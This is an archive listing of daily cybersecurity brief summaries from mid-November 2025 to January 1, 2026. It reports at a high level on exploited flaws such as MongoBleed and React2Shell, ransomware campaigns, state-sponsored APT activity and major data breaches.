This cybersecurity brief for January 1, 2026, covers a significant escalation in threat actor sophistication and critical infrastructure risks. Key developments include the Iranian APT 'Prince of Persia' adopting Telegram for command-and-control, the industrialization of Ransomware-as-a-Service (RaaS) into cartel-like operations, and the active exploitation of critical vulnerabilities like 'MongoBleed' (CVE-2025-14847) in MongoDB and 'React2Shell' (CVE-2025-55182) in Next.js servers. State-sponsored groups from China (Mustang Panda) and South America (BlindEagle) have also deployed advanced stealth techniques, while major data breaches at organizations like the University of Phoenix highlight the severe impact of these evolving threats.

Dec 31, 20253 articles

Critical Flaws in MongoDB & Medical Devices, alongside Major Supply Chain Breaches at Trust Wallet and Korean Air

This cybersecurity brief for December 31, 2025, covers a series of high-impact events, including the discovery of critical vulnerabilities in widely used technologies and significant data breaches stemming from supply chain compromises. Key incidents include 'MongoBleed,' a critical memory disclosure flaw in MongoDB, and a remote-hijacking vulnerability in WHILL electric wheelchairs. Supply chain attacks resulted in an $8.5 million theft from Trust Wallet users and the exposure of 30,000 Korean Air employee records. Additionally, a new malicious AI tool, 'DIG AI,' has emerged on the dark web, designed to automate cybercrime, and former cybersecurity professionals have pleaded guilty to conducting ransomware attacks, highlighting a severe insider threat.

Dec 30, 20256 articles

CISA Orders Emergency Patch for Actively Exploited 'MongoBleed' Flaw as Insider Threats and Supply Chain Attacks Rattle Industries

This cybersecurity brief for December 30, 2025, covers a series of critical incidents. The most prominent is the active exploitation of 'MongoBleed' (CVE-2025-14847), a severe memory leak vulnerability in MongoDB, which prompted an emergency directive from CISA. Other major events include the disclosure of a 10.0 CVSS RCE flaw in SmarterMail (CVE-2025-52691), the guilty pleas of two cybersecurity insiders who deployed ALPHV/BlackCat ransomware, and a massive data breach at the University of Phoenix affecting nearly 3.5 million individuals due to a Clop ransomware attack exploiting an Oracle zero-day. These events highlight escalating threats from unpatched vulnerabilities, insider risks, and sophisticated ransomware operations.

Dec 29, 20257 articles

CISA Warns of Actively Exploited 'MongoBleed' Flaw; Supply Chain Attacks Double in 2025 Amid Holiday Ransomware Surge

This cybersecurity brief for December 28-29, 2025, covers several critical developments. CISA has issued an urgent warning about the 'MongoBleed' (CVE-2025-14847) vulnerability in MongoDB, now under active exploitation. Supply chain attacks continue to escalate, with Korean Air suffering a breach via a subsidiary, attributed to the Clop ransomware group exploiting an Oracle zero-day. A year-end report confirms that software supply chain attacks more than doubled in 2025. Ransomware groups, including Qilin and Medusa, capitalized on the holiday period to launch a wave of attacks, while malicious Chrome extensions were found to have stolen AI chat data from nearly a million users. Finally, Microsoft and Adobe released their last patches of the year, fixing over 190 vulnerabilities, including an actively exploited Windows zero-day.

Dec 28, 20257 articles

Critical Flaws "MongoBleed" and "React2Shell" Actively Exploited, Major Data Breaches and Ransomware Attacks Continue Year-End Surge

This cybersecurity advisory for December 28, 2025, covers a series of critical threats, including the active exploitation of the "MongoBleed" (CVE-2025-14847) memory leak in MongoDB and the "React2Shell" (CVE-2025-55182) RCE vulnerability in the React framework. The period also saw major data breach disclosures from 700Credit and Baker University, affecting millions. Ransomware activity remains high, with attacks on Romanian critical infrastructure by "The Gentlemen" and a claimed breach of Chrysler by the Everest group. State-sponsored activity also features prominently with updated advisories on the BRICKSTORM backdoor and the re-emergence of Iran's "Prince of Persia" APT.

Dec 27, 20255 articles

MongoBleed Exploit Unleashed, React2Shell Deadline Passes Amid Active Attacks, and Ransomware Strikes European Critical Infrastructure

In the period of December 26-27, 2025, the cybersecurity landscape was dominated by the release of a public exploit for the critical 'MongoBleed' vulnerability (CVE-2025-14847), triggering widespread scanning and placing tens of thousands of MongoDB databases at immediate risk. Concurrently, the CISA deadline passed for patching the 'React2Shell' flaw (CVE-2025-55182), which is already under active exploitation by state-sponsored actors. The holiday period saw targeted ransomware attacks, with the 'Gentlemen' group hitting a major Romanian energy producer and LockBit 5.0 claiming a breach of a Greek luxury hotel brand. Other significant events include the discovery of a critical RCE in the n8n automation platform, a supply chain attack on Trust Wallet leading to a $7 million theft, and a sophisticated DNS poisoning campaign by the China-linked 'Evasive Panda' APT.

Dec 26, 20255 articles

Holiday Havoc: 'MongoBleed' Exploit Unleashed, Chinese APTs Escalate Attacks, and Critical Infrastructure Hit by Ransomware

This cybersecurity brief for December 26, 2025, covers a series of critical holiday-timed incidents. A public exploit for 'MongoBleed' (CVE-2025-14847), a severe memory leak flaw in MongoDB, has been released and is under active attack. Multiple Chinese APT groups, including 'Evasive Panda', 'Silver Fox', and 'HoneyMyte', have launched sophisticated espionage campaigns using advanced techniques like DNS poisoning and kernel-mode rootkits. Concurrently, a ransomware attack by the 'Gentlemen' group struck a major Romanian energy producer, and CISA issued alerts for several critical vulnerabilities, underscoring a period of heightened threat activity.

Dec 25, 20258 articles

ServiceNow's $7.75B Armis Buy, Pro-Russian DDoS Attacks, and AI-Powered Scams Define Holiday News Cycle

This cybersecurity brief for December 25, 2025, covers a volatile period marked by significant industry consolidation and escalating cyber threats. The lead story is ServiceNow's landmark $7.75 billion acquisition of Armis, signaling a major push towards AI-driven security platforms. In tandem, pro-Russian hacktivists launched a disruptive DDoS attack against France's postal service, crippling operations before Christmas. Regulatory actions saw the SEC charge seven firms in a $14 million AI-themed crypto scam that used deepfakes. Other major incidents include a supply chain breach at Nissan exposing 21,000 customers via a compromised Red Hat server, and a significant healthcare data breach originating from subcontractor TriZetto with a year-long dwell time. Reports also highlight a surge in AI-powered phishing targeting holiday shoppers and ICS systems in East Asia.

Dec 24, 20256 articles

Critical Zero-Days in Cisco, React, and Android Under Active Attack; WatchGuard & Fortinet Race to Patch Exploited Flaws

This cybersecurity brief for December 24, 2025, covers a surge of actively exploited critical vulnerabilities. Chinese state-sponsored actors are leveraging a CVSS 10.0 zero-day in Cisco email gateways, while another CVSS 10.0 flaw, React2Shell, is being used by nation-states against SaaS and FinTech firms. CISA has issued urgent patch deadlines for these, as well as for exploited flaws in WatchGuard firewalls, Fortinet devices, and the Android OS. Major data breaches were also disclosed, with Nissan confirming a supply chain attack via Red Hat affecting 21,000 customers, and the University of Sydney reporting a breach impacting 27,000 individuals due to a DevSecOps failure.

Dec 23, 20253 articles

Spotify Scraped, Nissan Breached, and UK Proposes New Cyber Laws

This cybersecurity brief for December 22-23, 2025, covers several major incidents. The hacktivist group Anna's Archive claimed a massive 300TB data scrape from Spotify, intending to release 86 million songs publicly. A supply chain attack on Red Hat led to a data breach at Nissan, exposing the personal information of 21,000 customers. In the US, Baker University disclosed a year-old breach affecting over 53,000 individuals, while the DoJ dismantled a $28 million bank fraud operation. In policy news, the UK introduced a new Cyber Security and Resilience Bill to modernize its laws. Other notable events include a new MacSync malware variant bypassing Apple's security and a ransomware attack on Romania's national water agency that used Microsoft's BitLocker.

Dec 22, 20256 articles

Romanian Water Authority Crippled by Ransomware, Apple Patches Exploited Zero-Days, and Nissan Discloses Third-Party Breach

In the 24-hour period ending December 22, 2025, the cybersecurity landscape was dominated by a significant ransomware attack on Romania's national water authority, which disrupted IT systems but spared critical water operations. Concurrently, Apple issued emergency patches for two actively exploited zero-day vulnerabilities in its WebKit engine. Major data breach disclosures also made headlines, with Nissan revealing a third-party breach affecting 21,000 customers, the University of Phoenix confirming a Clop ransomware incident impacting 3.5 million individuals, and AllerVie Health notifying patients of an attack by the Anubis ransomware group. These events highlight ongoing threats to critical infrastructure, the persistent danger of zero-day exploits, and the expanding attack surface through supply chains.

Dec 21, 20257 articles

Multiple Zero-Days Under Active Attack; Critical Flaws in Windows, SonicWall, and Web Frameworks Threaten Global Systems

For the period ending December 21, 2025, the cybersecurity landscape is dominated by a surge in actively exploited critical vulnerabilities. Security teams are grappling with zero-days in Microsoft Windows, SonicWall, and WatchGuard appliances, all added to CISA's KEV catalog. A new CVSS 10.0 flaw dubbed 'React2Shell' is being used to compromise web applications globally. Major incidents also include a significant data breach at fintech vendor Marquis impacting over 400,000 bank customers, a sophisticated 'GhostPairing' account takeover attack on WhatsApp, and a ransomware strike on an Australian fertility clinic. These events highlight persistent threats from unpatched systems, supply chain weaknesses, and social engineering.

Dec 20, 20256 articles

Critical Zero-Days and Actively Exploited Flaws Plague Cisco, Apple, HPE, and MongoDB

This cybersecurity advisory for December 20, 2025, covers a surge of critical vulnerabilities and active zero-day exploits. Major vendors including HPE, WatchGuard, Cisco, Apple, and MongoDB are scrambling to patch flaws being weaponized by threat actors, with CISA issuing multiple emergency directives. Highlights include a perfect 10.0 CVSS score for an HPE OneView RCE, actively exploited zero-days in Cisco email gateways and Apple products, and a memory leak in MongoDB dubbed 'MongoBleed'. Other significant events include a major data breach at the University of Sydney, a guilty plea from a Nefilim ransomware operator, and new social engineering attacks targeting WhatsApp users.

Dec 19, 20256 articles

Critical Zero-Days in Cisco, Chrome, and WatchGuard Actively Exploited; React2Shell Weaponized for Ransomware

This cybersecurity brief for December 19, 2025, covers a surge in critical vulnerability exploitation. Multiple threat actors are leveraging the React2Shell flaw (CVE-2025-55182) to deploy ransomware. Concurrently, a China-linked APT is exploiting a zero-day in Cisco email gateways (CVE-2025-20393), and actively exploited flaws in WatchGuard firewalls and Google Chrome are putting networks and users at severe risk. Other major incidents include critical patches for HPE OneView, significant data breaches at SoundCloud and 700Credit, and new regulatory updates from the UK.

Dec 18, 20254 articles

Microsoft Patches Actively Exploited Zero-Day as Phishing and Malware Tactics Evolve

This cybersecurity brief for December 18, 2025, covers several critical developments. The most urgent is Microsoft's final Patch Tuesday of the year, which addresses an actively exploited zero-day (CVE-2025-62221) in Windows, prompting a CISA directive. Concurrently, threat actors are escalating phishing campaigns against Microsoft 365 using OAuth device code abuse. Other significant events include the discovery of the 'GhostPoster' malware in Firefox add-ons, the emergence of AI-powered ransomware like 'PromptLock', and an investigation by Google into malicious code found within its search infrastructure.

Dec 17, 20257 articles

Critical React2Shell Flaw Under Widespread Attack, CISA Warns of Fortinet Exploit, and AI Fuels Cloud Risk

This cybersecurity brief for December 17, 2025, covers a surge in critical vulnerability exploitation. A CVSS 10.0 flaw in React, dubbed 'React2Shell,' is being widely abused by both state actors and cybercriminals to deploy backdoors and miners. CISA has added a critical, actively exploited Fortinet SSO vulnerability to its KEV catalog. Meanwhile, a new Palo Alto Networks report reveals that rapid AI adoption is massively expanding the cloud attack surface, with 99% of organizations reporting attacks on their AI systems. Other major events include a cyberattack on the French Interior Ministry, a novel 'ConsentFix' phishing technique bypassing MFA to hijack Microsoft accounts, and a large-scale malware alert in New Zealand for Lumma Stealer infections.

Dec 16, 20257 articles

Massive Financial Breaches Expose 18M+; Apple & Google Patch Actively Exploited Zero-Days

This cybersecurity brief for December 16, 2025, covers a series of critical incidents. Major data breaches at financial firms 700Credit and Prosper Marketplace have exposed the sensitive information of over 18 million individuals. Concurrently, Apple and Google rushed to patch two actively exploited zero-day vulnerabilities in the WebKit engine. Other significant events include CISA's mandate to patch a critical GeoServer flaw, active attacks on Fortinet SSO vulnerabilities, and data exposures at SoundCloud and Pornhub. Ransomware continues to plague the healthcare sector with an attack on Fieldtex by the Akira group, while new malware campaigns target developers on GitHub.

Dec 15, 20255 articles

Massive Data Breaches Expose Billions, as Critical Zero-Days in Apple and Google Products See Active Exploitation

This cybersecurity brief for December 15, 2025, covers a series of high-impact incidents. A colossal 16TB unsecured MongoDB database exposed 4.3 billion professional records, creating a massive risk for social engineering. Concurrently, a data breach at fintech firm 700Credit impacted 5.6 million individuals, exposing sensitive PII including Social Security numbers. Tech giants Apple and Google are racing to patch actively exploited zero-day vulnerabilities, with CISA adding one to its KEV catalog. Other critical threats include a newly discovered ransomware group named 'Gentlemen', an actively exploited flaw in Sierra Wireless routers affecting critical infrastructure, and a CVSS 10.0 vulnerability in an Apache Tika dependency impacting numerous Atlassian products.

Dec 14, 20257 articles

Apple Patches Actively Exploited Zero-Days; CISA Warns of Critical Router Flaw Amidst Ransomware Surge

In the period covering December 13-14, 2025, the cybersecurity landscape was dominated by critical vulnerability disclosures and active exploitation campaigns. Apple released an emergency patch for two zero-day flaws in iOS being used in targeted spyware attacks. CISA added a high-severity RCE vulnerability in Sierra Wireless routers to its KEV catalog. Meanwhile, ransomware groups KillSec and Qilin continued their global extortion campaigns, and several major data breaches came to light, including a massive 16TB database exposing 4.3 billion records and a breach at Canadian airline WestJet affecting 1.2 million passengers.

Dec 13, 20258 articles

React2Shell Ignites Global Exploitation Frenzy; Microsoft Patches Actively Exploited Zero-Day

This cybersecurity brief for December 13, 2025, covers a critical period marked by widespread, active exploitation of the 'React2Shell' vulnerability (CVE-2025-55182) by both criminal and state-sponsored actors, prompting urgent CISA directives. Concurrently, Microsoft's December Patch Tuesday addressed 57 flaws, including an actively exploited Windows zero-day (CVE-2025-62221). Other major incidents include a new Chrome zero-day on macOS, an unpatched zero-day in the Gogs Git service, a major npm supply chain attack by the 'Shai-Hulud 2.0' worm, and new campaigns from the Makop ransomware group and the Hamas-linked WIRTE APT.

Dec 12, 20255 articles

Microsoft and Google Patch Actively Exploited Zero-Days Amidst Major Healthcare Breaches and Sophisticated Supply Chain Attacks

In the 24-hour period ending December 12, 2025, the cybersecurity landscape was dominated by the urgent patching of actively exploited zero-day vulnerabilities by both Microsoft and Google. Microsoft's December Patch Tuesday addressed a critical privilege escalation flaw (CVE-2025-62221) already in use by attackers, while Google rushed out an emergency fix for its eighth Chrome zero-day this year. The healthcare sector remains under siege, with massive data breaches at Conduent and TriZetto Provider Solutions coming to light, affecting millions. Concurrently, new intelligence revealed sophisticated threats, including the "Shai-Hulud 2.0" supply chain worm, an espionage campaign by the Hamas-affiliated "Ashen Lepus" group, and a novel hardware attack named "Battering RAM" capable of breaking CPU security protections.

Dec 11, 20254 articles

Microsoft Patches Actively Exploited Zero-Day as Gogs Git Service Reels from Unpatched Flaw

In cybersecurity news for December 11, 2025, Microsoft issued its final Patch Tuesday of the year, addressing an actively exploited privilege escalation zero-day (CVE-2025-62221) in Windows. Concurrently, an unpatched zero-day (CVE-2025-8110) in the Gogs Git service is under active attack, compromising hundreds of instances. New malware threats emerged with 'DroidLock' targeting Android devices and the 'AshTag' suite used by the Ashen Lepus APT against Middle Eastern governments. Other significant developments include new vulnerabilities in React, sophisticated social engineering tactics detailed by HP, and an espionage campaign, 'Operation DupeHike,' targeting Russian corporations.

Dec 10, 20258 articles

React2Shell Mass Exploitation, Microsoft Zero-Day Patch, and NPM Supply Chain Chaos Dominate Threat Landscape

This cybersecurity brief for December 10, 2025, covers a period of intense activity, headlined by the widespread, multi-actor exploitation of the critical 'React2Shell' RCE vulnerability (CVE-2025-55182). Other major events include Microsoft's December Patch Tuesday addressing an actively exploited Windows zero-day, a massive NPM supply chain attack dubbed 'Shai-Hulud 2.0' that exfiltrated over 400,000 secrets, and a reported 700% surge in ransomware attacks targeting hypervisor infrastructure. The landscape is further marked by warnings of pro-Russian hacktivists targeting industrial systems and several large-scale data breaches.

Dec 9, 20253 articles

Global Patching Scramble as Critical "React2Shell" RCE Vulnerability Sees Widespread Exploitation

This cybersecurity brief for December 9, 2025, covers a critical unauthenticated RCE vulnerability, dubbed "React2Shell" (CVE-2025-55182), affecting React Server Components and now under active exploitation by multiple threat actors, including state-sponsored groups. Other major developments include the DeadLock ransomware using a novel "Bring Your Own Vulnerable Driver" technique to disable EDRs, the evolution of IAB Storm-0249's tactics, and a new "code-to-cloud" attack vector abusing leaked GitHub Personal Access Tokens. The brief details these threats, provides technical analysis, and offers actionable mitigation strategies for defenders.

Dec 8, 20258 articles

React2Shell Mass Exploitation: Critical RCE Flaw Hits Web, as Android Zero-Days and FinCEN Report Highlight Escalating Threats

This cybersecurity brief for December 8, 2025, covers a period of intense activity, headlined by the mass exploitation of 'React2Shell' (CVE-2025-55182), a critical 10.0 CVSS RCE vulnerability in React Server Components targeted by Chinese APTs. Other major events include Google's patch for two actively exploited Android zero-days, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and significant data breaches at universities and financial service providers linked to Cl0p and Akira ransomware gangs. The landscape is further defined by new malware threats like the BRICKSTORM backdoor and Albiriox Android trojan, and a White House executive order accelerating the transition to post-quantum cryptography.

Dec 7, 20255 articles

React2Shell Exploitation Surges as CISA Adds to KEV; Clop Hits NHS via Oracle Zero-Day

This cybersecurity brief for December 7, 2025, covers a critical period marked by the widespread, active exploitation of the React2Shell vulnerability (CVE-2025-55182), prompting its addition to CISA's KEV catalog. State-sponsored actors and cybercriminals are leveraging the flaw for broad attacks. Concurrently, the Clop ransomware group executed a significant data breach against the UK's Barts Health NHS Trust by exploiting an Oracle zero-day. Other major developments include the discovery of long-running supply chain attacks in Go and Rust package registries, a joint US-Canada warning about Chinese 'Brickstorm' malware targeting VMware, and a no-click vulnerability in WhatsApp leading to account takeovers. These events underscore the increasing sophistication of threats against software supply chains, critical infrastructure, and widely used applications.

Dec 6, 20257 articles

React2Shell Zero-Day Exploited by Chinese APTs, Triggers Global Cloudflare Outage; FinCEN Reports Ransomware Payments Top $2.1B

This cybersecurity brief for December 6, 2025, covers a critical 24-hour period dominated by the active exploitation of the React2Shell vulnerability (CVE-2025-55182). Chinese state-sponsored actors weaponized the CVSS 10.0 flaw within hours, prompting CISA to add it to the KEV catalog. The rush to mitigate the threat inadvertently caused a major global outage at Cloudflare. Concurrently, a new FinCEN report revealed ransomware payments have surpassed $2.1 billion in three years, highlighting the persistent financial drain of cybercrime. Other significant developments include the emergence of the Benzona ransomware, the Albiriox Android RAT, and a new cybercrime supergroup, 'Scattered LAPSUS$ Hunters,' threatening Salesforce data.

Dec 5, 20254 articles

Critical 'React2Shell' RCE Exploited by Chinese Hackers; Google Patches Android Zero-Days

This cybersecurity brief for December 5, 2025, covers a critical 10.0 CVSS vulnerability dubbed 'React2Shell' (CVE-2025-55182) being actively exploited by Chinese state-sponsored actors just hours after disclosure. Other major incidents include Google patching two actively exploited Android zero-days, a joint US-Canada alert on new 'BRICKSTORM' malware targeting VMware, and the Clop ransomware group breaching a major UK NHS trust.

Dec 4, 20255 articles

Critical 'React2Shell' RCE Threatens Web Ecosystem as CISA Warns of Chinese 'BRICKSTORM' Malware Targeting Governments

This cybersecurity brief for December 4, 2025, covers a critical 10.0 CVSS RCE vulnerability, 'React2Shell' (CVE-2025-55182), affecting React and Next.js, now under active exploitation. Concurrently, a joint advisory from CISA, NSA, and Canada's Cyber Centre details the sophisticated 'BRICKSTORM' backdoor used by PRC state-sponsored actors against government and IT sectors. Other major developments include CISA adding actively exploited Android and SCADA vulnerabilities to its KEV catalog, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and a significant data breach disclosure from Freedom Mobile.

Dec 3, 20257 articles

Android Zero-Days & Critical React RCE Exploited in Wild; Coupang Breach Hits 34M

This cybersecurity brief for December 3, 2025, covers a series of critical incidents, including the active exploitation of two Android zero-day vulnerabilities and a perfect 10.0 CVSS score RCE flaw in React and Next.js. A massive data breach at South Korean e-commerce giant Coupang exposed the data of nearly 34 million customers due to a compromised employee key. Other major developments include a supply-chain attack on the SmartTube app, new stealthy tactics from Iranian APT MuddyWater, a shift to data extortion by ransomware groups targeting manufacturing, and significant policy updates from the G7 and EU.

Dec 2, 20255 articles

Massive Data Breaches, Android Zero-Days, and APT Activity Mark a Turbulent Start to December

This cybersecurity brief for December 2, 2025, covers a series of high-impact incidents. Key stories include a supply chain attack on the popular SmartTube app for Android TV, a monumental data breach at South Korean e-commerce giant Coupang affecting 33.7 million users, and Google's emergency patch for two actively exploited Android zero-day vulnerabilities. Additionally, law enforcement dismantled a major crypto-laundering service, and new campaigns from Iranian and North Korean APT groups targeting critical infrastructure and financial sectors have been detailed.

Dec 1, 20257 articles

Coupang Data Breach Exposes 33.7M Users; Google Patches Actively Exploited Android Zero-Days

This cybersecurity brief for December 1, 2025, covers several critical incidents. The most prominent is a massive data breach at South Korean e-commerce giant Coupang, affecting 33.7 million users due to an authentication vulnerability. Concurrently, Google released an urgent Android update patching 107 flaws, including two zero-days under active exploitation. Other major events include the release of a proof-of-concept for a critical zero-click Outlook RCE, ongoing supply chain attacks from the Shai-Hulud 2.0 worm, and new intelligence on APT groups like Tomiris and those targeting industrial sectors.

Nov 30, 20257 articles

Supply Chain Under Siege: Malicious VS Code Extension, APT36 Linux Malware, and Major Data Breaches Rattle Global Industries

This cybersecurity brief for November 29-30, 2025, covers a series of high-impact incidents, led by the discovery of a malicious Visual Studio Code extension that infected over 16,000 developers using a sophisticated Solana blockchain-based C2. Concurrently, the APT36 threat actor escalated its cyber-espionage efforts by deploying custom Linux malware against Indian government entities. The period also saw major data breaches, including the exposure of Amazon data center blueprints from a steel contractor and the theft of 6.1 million Netmarble user records. In the financial sector, a DeFi exploit drained $9 million from Yearn Finance, while regulatory actions saw Comcast fined $1.5 million for a vendor-related breach, underscoring the pervasive risk across software development, government, and corporate supply chains.

Nov 29, 20258 articles

Qilin Ransomware Strikes Globally: Asahi and South Korean Financial Sector Hit in Major Campaigns

This cybersecurity brief for November 29, 2025, covers a series of high-impact attacks led by the Qilin ransomware group, including a massive data breach at Japanese beverage giant Asahi affecting nearly 2 million individuals and a sophisticated supply-chain attack that compromised 28 South Korean financial firms. Additional major events include espionage campaigns by APT groups Bloody Wolf and APT36, data breaches at Under Armour and DoorDash, and a cloud misconfiguration incident at Oracle. The period was marked by significant ransomware activity, nation-state espionage, and supply chain vulnerabilities.

Nov 28, 20259 articles

Supply Chain Attacks Surge as North Korean Hackers Flood NPM; CISA Issues Urgent Mobile & ICS Alerts

This cybersecurity advisory for November 27-28, 2025, highlights a significant escalation in software supply chain attacks, underscored by a North Korean campaign that flooded the NPM registry with nearly 200 malicious packages. Concurrently, CISA has issued critical warnings, adding an exploited ICS vulnerability (CVE-2021-26829) to its KEV catalog and releasing urgent guidance for mobile device security against commercial spyware. Other major incidents include a data breach at the French Football Federation exposing player information, a massive leak of over 17,000 secrets on public GitLab repositories, and evolving tactics from APT groups like Bloody Wolf and Tomiris targeting government entities across Central Asia.

Nov 27, 20258 articles

Ransomware Cripples US Emergency Alerts and London Councils; Critical Flaws in Azure and Oracle Under Active Attack

This cybersecurity brief for November 26-27, 2025, covers a series of high-impact ransomware attacks and critical vulnerability disclosures. The Inc Ransom group disrupted the CodeRED emergency alert system across the U.S., while a separate attack crippled services for three London councils. The Akira ransomware gang claimed attacks on five North American firms. Concurrently, CISA issued warnings for actively exploited vulnerabilities in Oracle Identity Manager (CVE-2025-61757) and spyware targeting messaging apps. A critical CVSS 10.0 authentication bypass flaw (CVE-2025-49752) was also discovered in Microsoft's Azure Bastion service, highlighting significant risks in both public infrastructure and cloud environments.

Nov 26, 20256 articles

CodeRED Emergency Alerts Downed by Ransomware; Major Banks Hit in Supply Chain Breach; Russia & North Korea APTs Collaborate

This cybersecurity brief for November 26, 2025, covers several critical incidents. A ransomware attack by the 'Inc Ransom' group has crippled the OnSolve CodeRED emergency alert system across the U.S., disrupting a vital public safety tool. In a major supply chain breach, financial tech vendor SitusAMC exposed sensitive data from top banks like JPMorgan Chase and Citi. Security researchers uncovered an unprecedented collaboration between Russian (Gamaredon) and North Korean (Lazarus) state-sponsored hacking groups using shared infrastructure. Additionally, a new, more destructive version of the 'Shai-Hulud' npm worm is causing widespread compromise, and CISA has issued warnings about spyware targeting Signal/WhatsApp users and multiple vulnerabilities in industrial control systems.

Nov 25, 20256 articles

Massive 'Sha1-Hulud' Supply Chain Attack Compromises 25,000+ GitHub Repos; CISA Warns of Multiple Actively Exploited Zero-Days

This intelligence briefing for November 25, 2025, covers a massive software supply chain attack named 'Sha1-Hulud' that has compromised over 25,000 GitHub repositories via malicious npm packages. Additionally, CISA has issued directives for actively exploited zero-day vulnerabilities in Oracle Identity Manager, Google Chrome, and Fortinet's FortiWeb. Other major threats include the Akira ransomware group targeting M&A activities, a surge in Black Friday phishing scams, and a data breach at a major banking vendor, SitusAMC.

Nov 24, 20252 articles

Supply Chain Attacks Cripple NPM and Salesforce; FCC Rolls Back ISP Security Rules

This 24-hour period saw a surge in high-impact supply chain attacks, with the 'Shai-Hulud' worm infecting hundreds of NPM packages and a breach at Gainsight exposing Salesforce customer data. Concurrently, a major cyberattack hit a key US mortgage vendor, and the FCC controversially rescinded ISP cybersecurity rules amidst ongoing nation-state threats. Ransomware and espionage campaigns also continue, with Akira hitting LG and a new APT, 'Autumn Dragon,' targeting Southeast Asia.

Nov 23, 20258 articles

Zero-Day Exploits Rock Oracle and Chrome; APTs Uncovered in Multi-Year Espionage Campaigns

This cybersecurity brief for November 23, 2025, covers a tumultuous period marked by the active exploitation of zero-day vulnerabilities in Oracle E-Business Suite by the Cl0p ransomware gang and in Google Chrome. Concurrently, researchers have exposed long-running cyberespionage campaigns by APT24 and APT31, which utilized sophisticated supply chain attacks and cloud-based C2 infrastructure. Other major incidents include a record-breaking 15.72 Tbps DDoS attack mitigated by Microsoft, a critical CVSS 10.0 vulnerability in Grafana Enterprise, and a series of data breaches impacting Harvard University, CrowdStrike, and Salesforce customers via a supply chain attack on Gainsight.

Nov 22, 20253 articles

Massive Supply Chain Attack Hits Salesforce Ecosystem; Critical Flaws in Oracle, Azure, and Grafana Emerge

This cybersecurity brief for November 22, 2025, covers a series of high-impact events. A major supply chain attack attributed to 'Scattered Lapsus$ Hunters' compromised over 200 companies by abusing OAuth tokens in a Salesforce-integrated app. Concurrently, CISA issued warnings for a critical, actively exploited RCE in Oracle Identity Manager. Critical 10.0 CVSS vulnerabilities were also disclosed in Microsoft Azure Bastion and Grafana Enterprise. Other significant threats include a new Android trojan stealing encrypted messages, a sophisticated Chinese APT campaign targeting Russia, and a botnet using the Ethereum blockchain for C2.

Nov 21, 20256 articles

ShinyHunters Breaches Salesforce Ecosystem via Gainsight; SEC Drops Landmark SolarWinds Lawsuit

This cybersecurity brief for November 20-21, 2025, covers major incidents including a ShinyHunters-led supply chain attack on Salesforce customers via the Gainsight app, the SEC's surprising dismissal of its lawsuit against SolarWinds and its CISO, and Microsoft's patching of an actively exploited Windows Kernel zero-day. Other key developments include a new SANS report on rising OT/ICS threats, the INC ransomware group targeting a Burj Khalifa fire-safety provider, and new cybersecurity regulations proposed in the UK.

Nov 20, 20255 articles

CISA Mandates Urgent Patching for Actively Exploited Fortinet, Chrome, and Windows Zero-Days

This cybersecurity brief for November 20, 2025, covers a series of critical zero-day vulnerabilities under active exploitation, prompting emergency directives from CISA. Key advisories include a Fortinet FortiWeb command injection flaw (CVE-2025-58034), a Windows Kernel privilege escalation bug (CVE-2025-62215), and a Google Chrome RCE vulnerability (CVE-2025-13223), all added to the KEV catalog. Additionally, this report details ransomware attacks by the 'sinobi' and 'Inc Ransom' groups, new CISA guidance on bulletproof hosting and drone threats, and research on the surge in AI-driven cyberattacks and a new macOS infostealer.

Nov 19, 20256 articles

Google Patches Actively Exploited Chrome Zero-Day as Ransomware Cripples PA Attorney General's Office

This cybersecurity brief for November 19, 2025, covers a critical period marked by urgent zero-day patching and high-stakes ransomware attacks. Google rushed to fix the seventh actively exploited Chrome zero-day of the year (CVE-2025-13223), a type confusion bug in the V8 engine. Concurrently, the Pennsylvania Attorney General's office confirmed a major data breach by the Inc Ransom group, who exploited a Citrix vulnerability to exfiltrate 5.7 TB of sensitive data. Other significant events include CISA adding a Fortinet FortiWeb flaw to its KEV catalog, international sanctions against a Russian bulletproof hosting network, and multiple data breaches affecting DoorDash and healthcare providers due to phishing and supply chain weaknesses.

Nov 18, 20258 articles

AI-Orchestrated Cyber Espionage Uncovered; Logitech Breached by Clop; Google Patches Actively Exploited Chrome Zero-Day

This intelligence brief for November 18, 2025, covers a landmark AI-driven espionage campaign by a Chinese state actor, a major data breach at Logitech by the Clop ransomware gang exploiting an Oracle zero-day, and an emergency patch from Google for an actively exploited Chrome vulnerability. Additional reports detail critical flaws in WordPress plugins, a defacement attack on Kenyan government websites, and a massive DDoS attack on critical infrastructure.

Nov 17, 20256 articles

Jaguar Land Rover Reels from £680M Cyberattack Loss; Cl0p Exploits Oracle Zero-Day in Massive Campaign

This intelligence brief for November 16-17, 2025, covers a series of high-impact cyber events. Key incidents include Jaguar Land Rover's staggering £680 million loss from a production-halting cyberattack, a widespread campaign by the Cl0p ransomware gang exploiting an Oracle E-Business Suite zero-day to breach Logitech and others, and the introduction of a sweeping new cybersecurity bill in the UK. Other major events include the discovery of 150,000 malicious NPM packages in a crypto-farming scheme, an actively exploited Windows Kernel zero-day patch from Microsoft, and multiple data breaches affecting DoorDash and Eurofiber.

Nov 16, 20256 articles

CISA Warns of Actively Exploited Fortinet Zero-Day; FBI Details Akira Ransomware's $250M Spree

In cybersecurity news for November 15-16, 2025, the landscape is dominated by the active exploitation of a critical zero-day vulnerability (CVE-2025-64446) in Fortinet's FortiWeb WAF, prompting an emergency directive from CISA. Concurrently, the FBI and CISA issued a stark warning about the Akira ransomware gang, which has extorted nearly $250 million from critical infrastructure sectors by exploiting VPNs. Other major developments include the discovery of an APT using two zero-days against Cisco and Citrix systems, a proposed overhaul of UK cybersecurity law, and a documented 30% surge in ransomware attacks in October, highlighting the rise of new groups like Qilin and Sinobi.

Nov 15, 20257 articles

Akira Ransomware Escalates Attacks as Flurry of Zero-Days Hits Microsoft, Fortinet, and Cisco

For the period of November 14-15, 2025, the cybersecurity landscape was dominated by the escalating threat of the Akira ransomware group, which has now extorted over $244 million and is actively targeting critical infrastructure with new exploits. Simultaneously, a wave of critical, actively exploited zero-day vulnerabilities impacted major enterprise vendors including Microsoft, Fortinet, and Cisco, prompting urgent patching directives from CISA. Other significant developments include a state-sponsored campaign weaponizing AI for espionage, an unverified but high-impact claim by the Clop gang against the UK's NHS, and a massive supply chain attack flooding the NPM registry with over 150,000 malicious packages for a novel token-farming scheme.

Nov 14, 20256 articles

Global Cybercrime Disrupted by 'Operation Endgame'; Cl0p Breaches Entrust with Oracle Zero-Day

